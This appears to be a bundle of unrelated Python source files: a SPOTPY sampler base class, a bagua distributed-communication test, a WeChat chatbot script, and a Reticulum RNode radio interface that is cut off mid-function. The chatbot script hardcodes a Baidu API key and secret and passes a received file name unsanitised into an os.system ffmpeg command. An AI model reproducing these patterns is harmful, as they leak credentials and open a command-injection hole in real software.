self.optimization_direction = optimization_direction # grid, maximize, minimize
print('Initializing the ',algorithm_name,' with ',repetitions,' repetitions')
if optimization_direction == 'minimize':
self.compare = self.minimizer
print('The objective function will be minimized')
if optimization_direction == 'maximize':
self.compare = self.maximizer
print('The objective function will be maximized')
if optimization_direction == 'grid':
self.compare = self.grid
self.rep = 0
self.parnames = parnames
self.parameters= len(parnames)
self.params_min = [np.nan]*self.parameters
self.params_max = [np.nan]*self.parameters
self.objectivefunction_min = 1e308
self.objectivefunction_max = -1e308
self.starttime = time.time()
self.last_print = time.time()
self.repetitions = repetitions
self.stop = False
def minimizer(self, objval, params):
if objval < self.objectivefunction_min:
self.objectivefunction_min = objval
self.params_min = list(params)
def maximizer(self, objval, params):
if objval > self.objectivefunction_max:
self.objectivefunction_max = objval
self.params_max = list(params)
def grid(self, objval, params):
if objval < self.objectivefunction_min:
self.objectivefunction_min = objval
self.params_min = list(params)
if objval > self.objectivefunction_max:
self.objectivefunction_max = objval
self.params_max = list(params)
def __call__(self, objectivefunction, params, block_print=False):
self.rep+=1
if type(objectivefunction) == type([]): #TODO: change to iterable
self.compare(objectivefunction[0], params)
elif type(objectivefunction) == type(np.array([])):
pass
else:
self.compare(objectivefunction, params)
if self.rep == self.repetitions:
self.stop = True
if not block_print:
self.print_status()
def print_status(self):
# Get a string showing the approximate time left until the end of the simulation in H:M:S
acttime = time.time()
# Refresh the progress bar every two seconds
if acttime - self.last_print >= 2:
avg_time_per_run = (acttime - self.starttime) / (self.rep + 1)
timestr = time.strftime("%H:%M:%S", time.gmtime(round(avg_time_per_run * (self.repetitions - (self.rep + 1)))))
if self.optimization_direction == 'minimize':
text = '%i of %i, minimal objective function=%g, time remaining: %s' % (
self.rep, self.repetitions, self.objectivefunction_min, timestr)
if self.optimization_direction == 'maximize':
text = '%i of %i, maximal objective function=%g, time remaining: %s' % (
self.rep, self.repetitions, self.objectivefunction_max, timestr)
if self.optimization_direction == 'grid':
text = '%i of %i, min objf=%g, max objf=%g, time remaining: %s' % (
self.rep, self.repetitions, self.objectivefunction_min, self.objectivefunction_max, timestr)
print(text)
self.last_print = time.time()
def print_status_final(self):
print('\n*** Final SPOTPY summary ***')
print('Total Duration: ' + str(round((time.time() - self.starttime), 2)) + ' seconds')
print('Total Repetitions:', self.rep)
if self.optimization_direction == 'minimize':
print('Minimal objective value: %g' % (self.objectivefunction_min))
print('Corresponding parameter setting:')
for i in range(self.parameters):
text = '%s: %g' % (self.parnames[i], self.params_min[i])
print(text)
if self.optimization_direction == 'maximize':
print('Maximal objective value: %g' % (self.objectivefunction_max))
print('Corresponding parameter setting:')
for i in range(self.parameters):
text = '%s: %g' % (self.parnames[i], self.params_max[i])
print(text)
if self.optimization_direction == 'grid':
print('Minimal objective value: %g' % (self.objectivefunction_min))
print('Corresponding parameter setting:')
for i in range(self.parameters):
text = '%s: %g' % (self.parnames[i], self.params_min[i])
print(text)
print('Maximal objective value: %g' % (self.objectivefunction_max))
print('Corresponding parameter setting:')
for i in range(self.parameters):
text = '%s: %g' % (self.parnames[i], self.params_max[i])
print(text)
print('******************************\n')
def __repr__(self):
return 'Min objectivefunction: %g \n Max objectivefunction: %g' % (
self.objectivefunction_min, self.objectivefunction_max)
class _algorithm(object):
"""
Implements an algorithm.
Input
----------
spot_setup: class
model: function
Should be callable with a parameter combination of the parameter-function
and return a list of simulation results (of the same length as the evaluation list).
parameter: function
When called, it should return a random parameter combination, which can
be e.g. uniform or Gaussian.
objectivefunction: function
Should return the objective function value for a given list of model simulations
and observations.
evaluation: function
Should return the true (observed) values against which the simulations are compared.
dbname: str
Name of the database where parameter, objectivefunction value and simulation
results will be saved.
dbformat: str
ram: fast, suited for short sampling times; no file is created and results are kept in an array.
csv: a csv file is created, which you can import afterwards.
parallel: str
seq: Sequential sampling (default): normal iterations on one core of your CPU.
mpc: Multiprocessing: iterations on all available cores of your (single) PC.
mpi: Message Passing Interface: parallel computing on high-performance computing clusters; mpi4py needs to be installed.
save_threshold: float or list
Compares the given value/list of values with the return value/list of values from spot_setup.objectivefunction.
If the objectivefunction value is higher, the results are saved in the database; if not, they are ignored (this saves storage).
db_precision: np.float type
set np.float16, np.float32 or np.float64 for rounding of floats in the output database
Default is np.float16
sim_timeout: float, int or None, default: None
if sim_timeout is not None, the model defined in the spot_setup class is aborted after
'sim_timeout' seconds.
If the model run was aborted, simply '[nan]' is returned.
random_state: int or None, default: None
the algorithm uses the number in random_state as the seed for numpy, so stochastic processes can be reproduced.
"""
_unaccepted_parameter_types = (parameter.List, )
def __init__(self, spot_setup, dbname=None, dbformat=None, dbinit=True,
dbappend=False, parallel='seq', save_sim=True, breakpoint=None,
backup_every_rep=100, save_threshold=-np.inf, db_precision=np.float16,
sim_timeout=None, random_state=None, optimization_direction='grid', algorithm_name=''):
# Initialize the user defined setup class
self.setup = spot_setup
param_info = parameter.get_parameters_array(self.setup, unaccepted_parameter_types=self._unaccepted_parameter_types)
self.all_params = param_info['random']
self.constant_positions = parameter.get_constant_indices(spot_setup)
if self.constant_positions:
self.non_constant_positions = []
for i, val in enumerate(self.all_params):
if self.all_params[i] not in self.constant_positions:
self.non_constant_positions.append(i)
else:
self.non_constant_positions = np.arange(0,len(self.all_params))
self.parameter = self.get_parameters
self.parnames = param_info['name']
self.algorithm_name = algorithm_name
# Create a type to hold the parameter values using a namedtuple
self.partype = parameter.ParameterSet(param_info)
self.evaluation = self.setup.evaluation()
self.save_sim = save_sim
self.optimization_direction = optimization_direction
self.dbname = dbname or 'customDb'
self.dbformat = dbformat or 'ram'
self.db_precision = db_precision
self.breakpoint = breakpoint
self.backup_every_rep = backup_every_rep
# Two parameters to control the data base handling
# 'dbinit' triggers the initial creation of the data base file
# 'dbappend' used to append to the existing data base, after restart
self.dbinit = dbinit
self.dbappend = dbappend
# Set the random state
if random_state is None: #ToDo: Have to discuss if these 3 lines are necessary.
random_state = np.random.randint(low=0, high=2**30)
np.random.seed(random_state)
# If sim_timeout is not None, a timeout is set so that the simulation is aborted after sim_timeout seconds without returning a value
self.sim_timeout = sim_timeout
self.save_threshold = save_threshold
self._return_all_likes = False #allows multi-objective calibration if set to True, is set by the algorithm
if breakpoint == 'read' or breakpoint == 'readandwrite':
print('Reading backupfile')
try:
open(self.dbname+'.break')
except FileNotFoundError:
print('Backupfile not found')
self.dbappend = True
# Now a repeater (ForEach-object) is loaded
# A repeater is a convenient wrapper to repeat tasks
# We have the same interface for sequential and for parallel tasks
if parallel == 'seq':
from spotpy.parallel.sequential import ForEach
elif parallel == 'mpi':
from spotpy.parallel.mpi import ForEach
# MPC is based on pathos multiprocessing and uses an ordered map, so results are returned in the
# same order in which the parameters were submitted
elif parallel == 'mpc':
from spotpy.parallel.mproc import ForEach
# UMPC is based on pathos multiprocessing and uses an unordered map, so results are returned in the
# order in which the subprocesses finish. This may speed up the whole simulation, but it is not
# recommended if the objective function depends on the order of the data, because the order of the
# results is effectively random
elif parallel == 'umpc':
from spotpy.parallel.umproc import ForEach
else:
raise ValueError(
"'%s' is not a valid keyword for parallel processing" % parallel)
# This is the repeater for the model runs. The simulate method does the work
# If you need different tasks, the repeater can be pushed into a "phase" using the
# setphase function. The simulate method can check the current phase and dispatch work
# to other functions. This is introduced for sceua to differentiate between burn in and
# the normal work on the chains
self.repeat = ForEach(self.simulate)
# method "save" needs to know whether objective function result is list or float, default is float
self.like_struct_typ = type(1.1)
def __str__(self):
return '{type}({mtype}())->{dbname}'.format(
type=type(self).__name__,
mtype=type(self.setup).__name__,
dbname=self.dbname)
def __repr__(self):
return '{type}()'.format(type=type(self).__name__)
def get_parameters(self):
"""
Returns the parameter array from the setup
"""
pars = parameter.get_parameters_array(self.setup)
return pars[self.non_constant_positions]
def set_repetiton(self, repetitions):
self.status = _RunStatistic(repetitions, self.algorithm_name,
self.optimization_direction, self.parnames)
# In MPI, this command will do nothing on the master process
# but the worker processes are going to wait for jobs.
# Hence the workers will only receive parameters for the
# simulate function, new calculation phases and the termination
self.repeat.start()
def final_call(self):
self.repeat.terminate()
try:
self.datawriter.finalize()
except AttributeError: # Happens if no database was assigned
pass
self.status.print_status_final()
def _init_database(self, like, randompar, simulations):
if self.dbinit:
print('Initialize database...')
self.datawriter = database.get_datawriter(self.dbformat,
self.dbname, self.parnames, like, randompar, simulations,
save_sim=self.save_sim, dbappend=self.dbappend,
dbinit=self.dbinit, db_precision=self.db_precision,
setup=self.setup)
self.dbinit = False
def __is_list_type(self, data):
if type(data) == type:
return data == list or data == type(np.array([]))
else:
return type(data) == list or type(data) == type(np.array([]))
def save(self, like, randompar, simulations, chains=1):
# Initialize the database if no run was performed so far
self._init_database(like, randompar, simulations)
# Test if like and the save threshold are float/list and compare accordingly
if self.__is_list_type(like) and self.__is_list_type(self.save_threshold):
if all(i > j for i, j in zip(like, self.save_threshold)): #Compares list/list
self.datawriter.save(like, randompar, simulations, chains=chains)
if (not self.__is_list_type(like)) and (not self.__is_list_type(self.save_threshold)):
if like>self.save_threshold: #Compares float/float
self.datawriter.save(like, randompar, simulations, chains=chains)
if self.__is_list_type(like) and (not self.__is_list_type(self.save_threshold)):
if like[0]>self.save_threshold: #Compares list/float
self.datawriter.save(like, randompar, simulations, chains=chains)
if (not self.__is_list_type(like)) and self.__is_list_type(self.save_threshold): #Compares float/list
if (like > self.save_threshold).all():
self.datawriter.save(like, randompar, simulations, chains=chains)
def read_breakdata(self, dbname):
''' Read data from a pickle file if a breakpoint is set.
Reason: In case of incomplete optimizations, old data can be restored. '''
import pickle
with open(dbname+'.break', 'rb') as breakfile:
work,backuptime,repos,obmin,obmax,pmin,pmax=pickle.load(breakfile)
self.status.starttime=self.status.starttime-backuptime
self.status.rep=repos
self.status.objectivefunction_min=obmin
self.status.objectivefunction_max=obmax
self.status.params_min=pmin
self.status.params_max=pmax
return work
def write_breakdata(self, dbname, work):
''' Write data to a pickle file if a breakpoint has been set.'''
import pickle
work=(work,self.status.last_print-self.status.starttime,self.status.rep,self.status.objectivefunction_min,self.status.objectivefunction_max,self.status.params_min,self.status.params_max)
with open(str(dbname)+'.break', 'wb') as breakfile:
pickle.dump(work, breakfile)
def getdata(self):
return self.datawriter.getdata()
def update_params(self, params):
#Add potential Constant parameters
self.all_params[self.non_constant_positions] = params
return self.all_params
def postprocessing(self, rep, params, simulation, chains=1, save_run=True, negativlike=False, block_print=False): # TODO: rep not necessary
params = self.update_params(params)
if negativlike is True:
like = -self.getfitness(simulation=simulation, params=params)
else:
like = self.getfitness(simulation=simulation, params=params)
# Save everything in the database, if save is True
# This is needed as some algorithms just want to know the fitness,
# before they actually save the run in a database (e.g. sce-ua)
self.status(like,params,block_print=block_print)
if save_run is True and simulation is not None:
self.save(like, params, simulations=simulation, chains=chains)
if self._return_all_likes:
return like
else:
try:
iter(like)
return like[0]
except TypeError: # Happens if iter(like) fails, i.e. if like is just one value
return like
def getfitness(self, simulation, params):
"""
Calls the user defined spot_setup objectivefunction
"""
try:
#print('Using parameters in fitness function')
return self.setup.objectivefunction(evaluation=self.evaluation, simulation=simulation, params = (params,self.parnames))
except TypeError: # Happens if the user does not allow to pass parameter in the spot_setup.objectivefunction
#print('Not using parameters in fitness function')
return self.setup.objectivefunction(evaluation=self.evaluation, simulation=simulation)
def simulate(self, id_params_tuple):
"""This is a simple wrapper of the model, returning the result together with
the run id and the parameters. This is needed, because some parallel things
can mix up the ordering of runs
"""
id, params = id_params_tuple
self.all_params[self.non_constant_positions] = params #TODO: List parameters are not updated if not accepted for the algorithm, we may have to warn/error if list is given
all_params = self.all_params
if self.sim_timeout:
# we need a layer to fetch returned data from a threaded process into a queue.
def model_layer(q,all_params):
# Call self.model with a namedtuple instead of another sequence
q.put(self.setup.simulation(self.partype(*all_params)))
# Start a queue; under Python 2.7 this is a multiprocessing class and can cause errors because of
# incompatibility with the main thread, so a workaround is needed for older Python versions
que = Queue()
sim_thread = threading.Thread(target=model_layer, args=(que, all_params))
sim_thread.daemon = True
sim_thread.start()
# If self.sim_timeout is not None, the model is aborted after self.sim_timeout seconds; otherwise it
# runs for as long as it needs
sim_thread.join(self.sim_timeout)
# If no result is returned from the thread, i.e. the thread was killed by the watcher, the default
# result is '[nan]' and will not be saved. Otherwise the result is fetched from the queue
model_result = None
if not que.empty():
model_result = que.get()
else:
model_result = self.setup.simulation(self.partype(*all_params))
return id, params, model_result
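
# Hedged usage sketch (not part of the original module): a minimal, hypothetical spot_setup
# illustrating the interface described in the _algorithm docstring above (parameters(),
# simulation(), evaluation(), objectivefunction()), and how an algorithm drives a run via
# set_repetiton(), simulate(), postprocessing() and final_call(). All names and values are
# assumptions for illustration only.
if __name__ == "__main__":
    class _ExampleSetup(object):
        def parameters(self):
            # one uniform parameter named 'x'
            return parameter.generate([parameter.Uniform('x', -1.0, 1.0)])
        def simulation(self, par):
            # toy model: a single simulated value
            return [par.x ** 2]
        def evaluation(self):
            # the observation the simulation is compared against
            return [0.0]
        def objectivefunction(self, evaluation, simulation):
            return abs(evaluation[0] - simulation[0])

    sampler = _algorithm(_ExampleSetup(), dbname='example', dbformat='ram',
                         optimization_direction='minimize', algorithm_name='example sketch')
    sampler.set_repetiton(5)
    for rep in range(5):
        pars = sampler.parameter()['random']
        _, pars, sim = sampler.simulate((rep, pars))
        sampler.postprocessing(rep, pars, sim)
    sampler.final_call()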
|
test_communicator.py
|
import unittest
import torch
import os
from bagua.torch_api.communication import (
init_bagua_communicator,
allreduce,
send,
recv,
allgather,
)
from tests.internal.common_utils import find_free_port
import multiprocessing
import bagua.torch_api as bagua
import threading
import time
from tests import skip_if_cuda_not_available
class Result(object):
def __init__(self):
self.ret = torch.Tensor([False]).bool()
self.data = torch.Tensor([0.0])
def init_env(rank, env):
os.environ["WORLD_SIZE"] = env["WORLD_SIZE"]
os.environ["LOCAL_WORLD_SIZE"] = env["LOCAL_WORLD_SIZE"]
os.environ["MASTER_ADDR"] = env["MASTER_ADDR"]
os.environ["MASTER_PORT"] = env["MASTER_PORT"]
os.environ["BAGUA_SERVICE_PORT"] = env["BAGUA_SERVICE_PORT"]
os.environ["RANK"] = str(rank)
os.environ["LOCAL_RANK"] = str(rank)
# init bagua distributed process group
torch.cuda.set_device(rank)
bagua.init_process_group()
def run_abort(rank, nprocs, results, env):
init_env(rank, env)
os.environ["NCCL_PROTO"] = "^LL128"
comm_stream = torch.cuda.Stream()
comm = init_bagua_communicator(model_name="test_comm", stream=comm_stream)
def abort():
time.sleep(10)
comm.abort()
threading.Thread(target=abort).start()
with torch.cuda.stream(comm_stream):
data = torch.rand(10).cuda()
for _ in range(rank + 1):
comm.allreduce_inplace(data.to_bagua_tensor().bagua_backend_tensor(), 10)
comm_stream.synchronize()
def run_allreduce(rank, nprocs, results, env):
init_env(rank, env)
send_tensor = torch.rand(100).cuda()
recv_tensor = torch.zeros_like(send_tensor)
tensor = send_tensor.clone()
allreduce(send_tensor, recv_tensor)
torch.distributed.all_reduce(tensor)
results[rank].ret[0] = torch.equal(recv_tensor, tensor)
def run_p2p(rank, nprocs, results, env):
init_env(rank, env)
send_tensor = torch.rand(100).cuda()
recv_tensor = torch.zeros_like(send_tensor)
if rank % 2 == 0:
send(send_tensor, dst=(rank + 1) % nprocs)
results[rank].data.copy_(torch.norm(send_tensor))
else:
recv(recv_tensor, src=(rank - 1 + nprocs) % nprocs)
results[rank].data.copy_(torch.norm(recv_tensor))
def run_allgather(rank, nprocs, results, env):
init_env(rank, env)
send_tensor = torch.rand(100).cuda()
recv_tensor = torch.zeros(
[nprocs, 100], device=send_tensor.device, dtype=send_tensor.dtype
)
tensor = send_tensor.clone()
tensor_list = [torch.zeros_like(tensor) for _ in range(nprocs)]
allgather(send_tensor, recv_tensor)
torch.distributed.all_gather(tensor_list, tensor)
ret = True
for i in range(nprocs):
ret = ret and torch.equal(recv_tensor[i], tensor_list[i])
results[rank].ret[0] = ret
class TestCommunication(unittest.TestCase):
def run_test_locally(self, fn):
nprocs = torch.cuda.device_count()
env = {
"WORLD_SIZE": str(nprocs),
"LOCAL_WORLD_SIZE": str(nprocs),
"MASTER_ADDR": "127.0.0.1",
"MASTER_PORT": str(find_free_port(8000, 8100)),
"BAGUA_SERVICE_PORT": str(find_free_port(9000, 9100)),
}
mp = multiprocessing.get_context("spawn")
results = [Result() for _ in range(nprocs)]
processes = []
for i in range(nprocs):
p = mp.Process(
target=fn,
args=(i, nprocs, results, env),
)
p.start()
processes.append(p)
for p in processes:
p.join(timeout=60)
self.assertTrue(p.exitcode == 0)
return results
@skip_if_cuda_not_available()
def test_abort(self):
self.run_test_locally(run_abort)
@skip_if_cuda_not_available()
def test_allreduce(self):
results = self.run_test_locally(run_allreduce)
for ret in results:
self.assertTrue(ret.ret.item())
@skip_if_cuda_not_available()
def test_p2p(self):
results = self.run_test_locally(run_p2p)
i = 1
while i < len(results):
self.assertTrue(torch.equal(results[i].data, results[i - 1].data))
i += 2
@skip_if_cuda_not_available()
def test_allgather(self):
results = self.run_test_locally(run_allgather)
for ret in results:
self.assertTrue(ret.ret.item())
if __name__ == "__main__":
unittest.main()
|
front.py
|
# coding=utf-8
"""
This is the interface to WeChat.
This is the script that should be run!
Resources on itchat: http://www.tuicool.com/articles/VJZRRfn ; GitHub: https://github.com/littlecodersh/ItChat
"""
import os
import random
import threading
import time
import itchat
from itchat.content import *
from code import main
from code.modules.voice import *
ROBOT_NAME = 'Cherry' # **Important!**: change ROBOT_NAME to the name of your own personal WeChat account
@itchat.msg_register(FRIENDS)
def add_friend(msg):
itchat.add_friend(**msg['Text']) # This automatically records the new friend's info; there is no need to reload the contact list
itchat.send_msg('我自动接受了你的好友请求,Nice to meet you!', msg['RecommendInfo']['UserName'])
@itchat.msg_register(RECORDING)
def recoding_reply(msg):
api_key = "IfGaEWNp6MGpKHuGv0cRqmig"
api_secret = "4077f676b0b342e841da655e07a8faa2"
bdr = BaiduRest("test_python", api_key, api_secret)
msg['Text'](msg['FileName'])
f = msg['FileName'] + '.wav'
os.system('ffmpeg -i ' + msg['FileName'] + ' -ac 1 -ar 8000 -vn ' + f) # use ffmpeg to convert the mp3 to wav
content = bdr.get_text(msg['FileName'] + '.wav')
os.remove(msg['FileName'])
os.remove(f)
return main.reply(content[0], msg['FromUserName'][3:len(msg['FromUserName']) - 10])
@itchat.msg_register(TEXT)
def text_reply(msg):
content = msg['Text']
fromUserName = msg['FromUserName']
reply = main.reply(content, fromUserName[5:10])
time.sleep(random.randint(0, len(content)))
itchat.send(reply, toUserName=msg['FromUserName'])
@itchat.msg_register(TEXT, isGroupChat=True) # handlers registered later take precedence over earlier ones, so handling group-chat messages here avoids conflicts
def group_text_reply(msg):
if msg['isAt']: # only react if the message @-mentions the bot itself
fromUserName = msg['FromUserName']
content = msg['Text']
# at this point content still contains the '@...' mention
content = content[0:content.find(ROBOT_NAME) - 1] + content[
msg['Text'].find(ROBOT_NAME) + len(ROBOT_NAME):len(content)]
# this line removes the '@...' mention from content
reply = main.reply(content, fromUserName[5:10])
time.sleep(random.randint(0, len(reply)))
itchat.send(u'@%s\u2005%s' % (msg['ActualNickName'], reply), fromUserName)
# the '@...' must be followed by the Unicode character '\u2005' for the mention to be valid
def birthday(): # TODO: rewrite this function 2017_07_27
p = [['07', '00', '00', '早安', 1], ['12', '00', '00', '午好', 1], ['22', '00', '00', '晚安', 1]]
class15ChatroomID = '@@988d6acddf9c8fa9fb97ed867e548633233b842a6602a11afc16728b672c697c'
while (1):
year = time.strftime('%Y', time.localtime(time.time()))
month = time.strftime('%m', time.localtime(time.time()))
day = time.strftime('%d', time.localtime(time.time()))
hour = time.strftime('%H', time.localtime(time.time()))
min = time.strftime('%M', time.localtime(time.time()))
second = time.strftime('%S', time.localtime(time.time()))
if hour == '00':
for i in range(0, len(p)):
p[i][4] = 0
for i in range(0, len(p)):
if p[i][4] == 0:
if (p[i][0] <= hour) and (p[i][1] <= min) and (p[i][2] <= second): # TODO: resolve the edge case where execution speed conflicts with the per-second comparison
itchat.send(p[i][3], class15ChatroomID)
p[i][4] = 1
itchat.auto_login(hotReload=True) # 'hotReload=True' keeps the login session so short disconnections reconnect automatically
thread1 = threading.Thread(target=itchat.run)
thread2 = threading.Thread(target=birthday)
thread1.start()
thread2.start()
itchat.dump_login_status()
|
RNodeInterface.py
|
from .Interface import Interface
from time import sleep
import sys
import serial
import threading
import time
import math
import RNS
class KISS():
FEND = 0xC0
FESC = 0xDB
TFEND = 0xDC
TFESC = 0xDD
CMD_UNKNOWN = 0xFE
CMD_DATA = 0x00
CMD_FREQUENCY = 0x01
CMD_BANDWIDTH = 0x02
CMD_TXPOWER = 0x03
CMD_SF = 0x04
CMD_CR = 0x05
CMD_RADIO_STATE = 0x06
CMD_RADIO_LOCK = 0x07
CMD_DETECT = 0x08
CMD_READY = 0x0F
CMD_STAT_RX = 0x21
CMD_STAT_TX = 0x22
CMD_STAT_RSSI = 0x23
CMD_STAT_SNR = 0x24
CMD_BLINK = 0x30
CMD_RANDOM = 0x40
CMD_FW_VERSION = 0x50
CMD_ROM_READ = 0x51
DETECT_REQ = 0x73
DETECT_RESP = 0x46
RADIO_STATE_OFF = 0x00
RADIO_STATE_ON = 0x01
RADIO_STATE_ASK = 0xFF
CMD_ERROR = 0x90
ERROR_INITRADIO = 0x01
ERROR_TXFAILED = 0x02
ERROR_EEPROM_LOCKED = 0x03
@staticmethod
def escape(data):
data = data.replace(bytes([0xdb]), bytes([0xdb, 0xdd]))
data = data.replace(bytes([0xc0]), bytes([0xdb, 0xdc]))
return data
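
# Hedged illustration (not part of the original interface code): a KISS data frame, as assembled
# in RNodeInterface.processOutgoing below, is the escaped payload wrapped in FEND delimiters with
# the data command byte in front:
#
#   FEND | CMD_DATA | KISS.escape(payload) | FEND
#
# A minimal sketch, assuming a bytes payload:
def _example_kiss_data_frame(payload):
    return bytes([KISS.FEND]) + bytes([KISS.CMD_DATA]) + KISS.escape(payload) + bytes([KISS.FEND])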
class RNodeInterface(Interface):
MAX_CHUNK = 32768
owner = None
port = None
speed = None
databits = None
parity = None
stopbits = None
serial = None
FREQ_MIN = 137000000
FREQ_MAX = 1020000000
RSSI_OFFSET = 157
CALLSIGN_MAX_LEN = 32
def __init__(self, owner, name, port, frequency = None, bandwidth = None, txpower = None, sf = None, cr = None, flow_control = False, id_interval = None, id_callsign = None):
self.serial = None
self.owner = owner
self.name = name
self.port = port
self.speed = 115200
self.databits = 8
self.parity = serial.PARITY_NONE
self.stopbits = 1
self.timeout = 100
self.online = False
self.frequency = frequency
self.bandwidth = bandwidth
self.txpower = txpower
self.sf = sf
self.cr = cr
self.state = KISS.RADIO_STATE_OFF
self.bitrate = 0
self.last_id = 0
self.first_tx = None
self.r_frequency = None
self.r_bandwidth = None
self.r_txpower = None
self.r_sf = None
self.r_cr = None
self.r_state = None
self.r_lock = None
self.r_stat_rx = None
self.r_stat_tx = None
self.r_stat_rssi = None
self.r_random = None
self.packet_queue = []
self.flow_control = flow_control
self.interface_ready = False
self.validcfg = True
if (self.frequency < RNodeInterface.FREQ_MIN or self.frequency > RNodeInterface.FREQ_MAX):
RNS.log("Invalid frequency configured for "+str(self), RNS.LOG_ERROR)
self.validcfg = False
if (self.txpower < 0 or self.txpower > 17):
RNS.log("Invalid TX power configured for "+str(self), RNS.LOG_ERROR)
self.validcfg = False
if (self.bandwidth < 7800 or self.bandwidth > 500000):
RNS.log("Invalid bandwidth configured for "+str(self), RNS.LOG_ERROR)
self.validcfg = False
if (self.sf < 7 or self.sf > 12):
RNS.log("Invalid spreading factor configured for "+str(self), RNS.LOG_ERROR)
self.validcfg = False
if (self.cr < 5 or self.cr > 8):
RNS.log("Invalid coding rate configured for "+str(self), RNS.LOG_ERROR)
self.validcfg = False
if id_interval != None and id_callsign != None:
if (len(id_callsign.encode("utf-8")) <= RNodeInterface.CALLSIGN_MAX_LEN):
self.should_id = True
self.id_callsign = id_callsign.encode("utf-8")
self.id_interval = id_interval
else:
RNS.log("The encoded ID callsign for "+str(self)+" exceeds the max length of "+str(RNodeInterface.CALLSIGN_MAX_LEN)+" bytes.", RNS.LOG_ERROR)
self.validcfg = False
else:
self.id_interval = None
self.id_callsign = None
if (not self.validcfg):
raise ValueError("The configuration for "+str(self)+" contains errors, interface is offline")
try:
RNS.log("Opening serial port "+self.port+"...")
self.serial = serial.Serial(
port = self.port,
baudrate = self.speed,
bytesize = self.databits,
parity = self.parity,
stopbits = self.stopbits,
xonxoff = False,
rtscts = False,
timeout = 0,
inter_byte_timeout = None,
write_timeout = None,
dsrdtr = False,
)
except Exception as e:
RNS.log("Could not open serial port for interface "+str(self), RNS.LOG_ERROR)
raise e
if self.serial.is_open:
sleep(2.0)
thread = threading.Thread(target=self.readLoop)
thread.setDaemon(True)
thread.start()
self.online = True
RNS.log("Serial port "+self.port+" is now open")
RNS.log("Configuring RNode interface...", RNS.LOG_VERBOSE)
self.initRadio()
if (self.validateRadioState()):
self.interface_ready = True
RNS.log(str(self)+" is configured and powered up")
sleep(1.0)
else:
RNS.log("After configuring "+str(self)+", the reported radio parameters did not match your configuration.", RNS.LOG_ERROR)
RNS.log("Make sure that your hardware actually supports the parameters specified in the configuration", RNS.LOG_ERROR)
RNS.log("Aborting RNode startup", RNS.LOG_ERROR)
self.serial.close()
raise IOError("RNode interface did not pass validation")
else:
raise IOError("Could not open serial port")
def initRadio(self):
self.setFrequency()
self.setBandwidth()
self.setTXPower()
self.setSpreadingFactor()
self.setCodingRate()
self.setRadioState(KISS.RADIO_STATE_ON)
def setFrequency(self):
c1 = self.frequency >> 24
c2 = self.frequency >> 16 & 0xFF
c3 = self.frequency >> 8 & 0xFF
c4 = self.frequency & 0xFF
data = KISS.escape(bytes([c1])+bytes([c2])+bytes([c3])+bytes([c4]))
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_FREQUENCY])+data+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
raise IOError("An IO error occurred while configuring frequency for "+self(str))
def setBandwidth(self):
c1 = self.bandwidth >> 24
c2 = self.bandwidth >> 16 & 0xFF
c3 = self.bandwidth >> 8 & 0xFF
c4 = self.bandwidth & 0xFF
data = KISS.escape(bytes([c1])+bytes([c2])+bytes([c3])+bytes([c4]))
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_BANDWIDTH])+data+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
raise IOError("An IO error occurred while configuring bandwidth for "+self(str))
def setTXPower(self):
txp = bytes([self.txpower])
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_TXPOWER])+txp+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
raise IOError("An IO error occurred while configuring TX power for "+self(str))
def setSpreadingFactor(self):
sf = bytes([self.sf])
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_SF])+sf+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
raise IOError("An IO error occurred while configuring spreading factor for "+self(str))
def setCodingRate(self):
cr = bytes([self.cr])
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_CR])+cr+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
raise IOError("An IO error occurred while configuring coding rate for "+self(str))
def setRadioState(self, state):
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_RADIO_STATE])+bytes([state])+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
raise IOError("An IO error occurred while configuring radio state for "+self(str))
def validateRadioState(self):
RNS.log("Validating radio configuration for "+str(self)+"...", RNS.LOG_VERBOSE)
sleep(0.25)
if (self.frequency != self.r_frequency):
RNS.log("Frequency mismatch", RNS.LOG_ERROR)
self.validcfg = False
if (self.bandwidth != self.r_bandwidth):
RNS.log("Bandwidth mismatch", RNS.LOG_ERROR)
self.validcfg = False
if (self.txpower != self.r_txpower):
RNS.log("TX power mismatch", RNS.LOG_ERROR)
self.validcfg = False
if (self.sf != self.r_sf):
RNS.log("Spreading factor mismatch", RNS.LOG_ERROR)
self.validcfg = False
if (self.validcfg):
return True
else:
return False
def updateBitrate(self):
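# The LoRa on-air bitrate below is SF * (4 / CR) / (2**SF / (BW in kHz)) * 1000 bps.
# Worked example (values assumed for illustration): SF 7, CR 4/5 (r_cr == 5) and
# 125 kHz bandwidth give 7 * 0.8 / (128 / 125) * 1000, roughly 5469 bps or 5.47 kbps.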
try:
self.bitrate = self.r_sf * ( (4.0/self.r_cr) / (math.pow(2,self.r_sf)/(self.r_bandwidth/1000)) ) * 1000
self.bitrate_kbps = round(self.bitrate/1000.0, 2)
RNS.log(str(self)+" On-air bitrate is now "+str(self.bitrate_kbps)+ " kbps", RNS.LOG_INFO)
except:
self.bitrate = 0
def processIncoming(self, data):
self.owner.inbound(data, self)
def processOutgoing(self,data):
if self.online:
if self.interface_ready:
if self.flow_control:
self.interface_ready = False
if data == self.id_callsign:
self.first_tx = None
else:
if self.first_tx == None:
self.first_tx = time.time()
data = KISS.escape(data)
frame = bytes([0xc0])+bytes([0x00])+data+bytes([0xc0])
written = self.serial.write(frame)
if written != len(frame):
raise IOError("Serial interface only wrote "+str(written)+" bytes of "+str(len(data)))
else:
self.queue(data)
def queue(self, data):
self.packet_queue.append(data)
def process_queue(self):
if len(self.packet_queue) > 0:
data = self.packet_queue.pop(0)
self.interface_ready = True
self.processOutgoing(data)
elif len(self.packet_queue) == 0:
self.interface_ready = True
def readLoop(self):
try:
in_frame = False
escape = False
command = KISS.CMD_UNKNOWN
data_buffer = b""
command_buffer = b""
last_read_ms = int(time.time()*1000)
while self.serial.is_open:
if self.serial.in_waiting:
byte = ord(self.serial.read(1))
last_read_ms = int(time.time()*1000)
